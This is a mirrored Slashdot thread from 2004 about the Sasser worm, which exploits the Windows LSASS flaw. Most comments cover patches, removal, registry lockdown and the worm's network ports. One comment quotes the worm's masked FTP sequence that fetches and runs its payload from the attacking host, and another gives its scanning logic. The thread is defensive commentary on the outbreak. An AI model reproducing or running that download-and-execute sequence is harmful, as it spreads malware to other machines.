Slashdot Mirror
New Windows Worm on the Loose
Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."
For anyone already infected, Microsoft has manual removal instructions for the worm, located here:
. asp
http://www.microsoft.com/security/incident/sasser
its started when you do
# apt-get update && apt-get dist-upgrade
Toolbars and similar items would not be prevented by blocking mutex's as far as I know, because they don't create one. They run under the IE process.
However, for most other types of spyware I completely agree, that would be an excellent idea for screening running processes.
"I will trust Google to 'do no evil' until the founders no longer run it." Hello Alphabet.
Interesting concept, but many programs use lots of mutexes, and some don't use them at all.
Imagine running something complex like a database server. Dialog box fun.
The virus writers will just use something else, like a file, if people tracked by mutex.
You can set permissions in the registry per key.
n
Make it impossible to write to HKLM/software/microsoft/windows/currentversion/ru
More information at Computer Associates, F-Secure, Symantec and McAfee.
Where's Panda in that list? Personally I prefer Panda over those.
It then connects to that shell, and executes the following commands (cleaned up to get past slasdot's junk filter):
open XXX.XXX.XXX.XXX 5554
anonymous
user
bin
get XXXXX_up.exe
bye
XXXXX_up.exe
If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:
The IP addresses generated by the worm are distributed as follows:
50% are completely random
25% have the same first octet as the IP
address of the infected host
25% have the same first and second octet as the IP address of the infected host.
The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.
See:
Use regedt32.exe (which is an older incarnation of regedit), go to the key in question, choose Security | Permissions ... from the menu etc...
Err, Startup Monitor does just that.
Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..
My email addy? should be easy enough.
Run "regedit", then right click any key, and select "Permissions" -- you get a standard NTFS permissions box to fiddle with at your leisure.
Note this only works on NT-based systems (e.g., WinXP)
It exists already. There are several, some free, some not, but the most useful (and free!) one I've found so far is the brand-new Spybot TeaTimer. It's available with the newest release candidate. You can download that here (link at the bottom of the forum post). Just run Spybot SD, do the immunization and such, run the scan, then switch it to Advanced mode and activate the "resident protection". Bingo. Nothing will ever write itself into your startup, or install a BHO, or toolbar, or change your homepage, without your knowledge and permission. Bear in mind it's a release candidate and there may be bugs; I know the Teatimer sometimes shuts off when you run the main Spybot program, and you have to go activate it again. Other than that it seems to work like a charm.
End of lesson. You may press the button.
The patches were released on the 13th of April, there were four patches, of which, put togeather, they patch 20 different vunerabilities.
My email addy? should be easy enough.
You've probably already installed it, just look for KB835732 in your list of installed updates.
In addition to TCP 1025, the following ports are vulnerable to the LSASS exploit: TCP 135, 139, 445, and 593. UDP 135, 137, 138, and 445.
t in /MS04-011.mspx
Sasser generates traffic on TCP ports 445, 5554 and 9996.
The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:
http://www.microsoft.com/technet/security/bulle
This link should work for the symantec description of Sasser. Sangloth I'd appreciate any comment with a logical basis...it doesn't even have to agree with me.
It's called X Window System, not X Windows. Calling someone an MS fanboy because they point this out is uncalled for. Speaking of which... there are MS fanboys? Are these people out of their minds?
Everyone knows not to use windows products until after at least 1 service pack, this is an old problem that was fixed with service pack 1. I hope no one on /. is affected by this, because even if you miss most updates, the service packs are the important ones.
I run Windows XP Pro at home so this post raised my concern at first, but if anyone actually read the Microsoft security bulletin, you would all know this.
Before I get flamed for running Windows, that box mostly just runs games, though sometimes I have it running distccKNOPPIX to help cross-compile for my Gentoo Box, its time to rebuild again now that 2004.1 came out!!!!
~ there are 10 types of people in this world, those that can read binary and those that can't
I had stopped ZA from starting up by default for the past few days, but I enabled it which allowed me to grab that one patch.
The worm can be removed with McAfee's stinger tool (the Mcafee link has a link to it).
Systems all clear.
www.google.com
WinPatrol does this as well, along with protecting/watching many other aspects of the system for potentially unwanted changes.
SUS again updates only the OS + Office suite, so that doesn't cut it.
I would certainly prefer to wait a few hours for a test machine to compile a package and then be able to deploy it (binary) to all the machines after testing. It's all in the choice of design, Windows is still at heart a single user operating system, Linux, Unix, BSD, etc are all multi-user operating systems, and it is reflected in installs.
You can also enable auditing that will record attempts to access keys you want to watch in the same dialog (see Advanced->Auditing). But first, you have to enable the auditing policy: in the control panel, go to Administrative Tools->Local Security Policy. Then Local Policies->Audit Policy. Registry keys are considered objects.
Access attempts will show up in the event viewer.
Note:use regedt32.exe for Win2000 or eariler. For later versions, regedit.exe does everything (under Edit->Permissions).
most of these problems they have (certain virii, spyware adware) could be alleviated and less of a threat simply by running limited user accounts instead of running as an "admin" all the time.
tested this in my home network (the other half has to have windows) her rights are set by a samba acting as a PDC(i was bored), but basically boils down to a simple matter of her account is considered a "limited account" to her local XP machine...if something needs to be installed or needs admin rights she can explicitly tell it to by using the run as...
i've went from cleaning 50+ items / week off that machine to maybe 3-4 and those are simply cookies being reported as "spyware".
Someone here obviously isn't using the 2.6 kernel tree with the happy new scheduler and timer. I can be happily compiling openoffice and still watch dvd's, play music, browse the web...anything else?
Unstable Apps: Our Android Apps Don't Suck
Sasser was released 18 days after Microsoft released the patch. For comparison, Blaster was 32 days after the patch and Witty was 1 day(!).
There are several modes for the "automatic" updates; some depend on OS/SP and if you have SUS/WUS installed. (if its a work laptop, they may have SUS/WUS configured for the updating process.)
In 2k and XP, you can
1- do nothing
2- Ask before downloading and before installing. (only admin users can say yes)
3- download updates automatically, but ask for installation (only admin users can install; they are asked if you they want to go ahead with the install)
4- automatically install at a fixed time (default 2 or 3 am); if a reboot is needed when a user logs in, it asks to reboot.
by default its #3.
in 2k, the option can be changed in the control panel (sp3 or higher needed).
in XP, right click on "my computer", properties, go to the automatic updates tab.
--
Time is on my side
try using a google cache.
i've told soo many others by so now, so i might as well put it on slashdot
Blah blah sig blah blah blah irony blah blah
Our student dorm has its own network volunteer group, which I'm part of. This worm made a big entrance tonight, scoring 27 infections in two hours, on a network comprising about 300 machines, maybe 220 of which are running Windows. We had to take the suckers off the network AND because that's part of our self-imposed policy, drop a filled-in piece of paper into their letter boxes. I felt like the mail man, running around in the entrance hall with a wad of papers under my arm. Oh, and our upstream ISP got pissed at us, threatening to cut our connection alltogether. To sum it all up, I'm going to kill the guy who wrote this, right after I cheerfully refuse to reconnect all the suckers who fell for it!
Divide et impera!
actually, on XP with default settings, commdlg32.dll (or any other system file) will be restored by the OS when you delete it from a backup location
Your own fault disabling the Crypto service. Without it the winupdate cannot verify the signatures. Those stupid 'xp optimization guides' commonly tell you that disabling it is a good idea...
you could make a shell script that does it all for you that is set UID root
No, you can't. Linux ignores the suid flag on scripts.
Centralization breaks the internet.
my vpn server uses one TCP port nya nya.
VPN over TCP will give you performance problems. In fact any tunnel device over TCP will give you performance problems. It is the two instances of TCP in the protocol stack that is responsible for most of the problems. Any VPN system built on TCP is broken, it should be build on UDP.
Do you care about the security of your wireless mouse?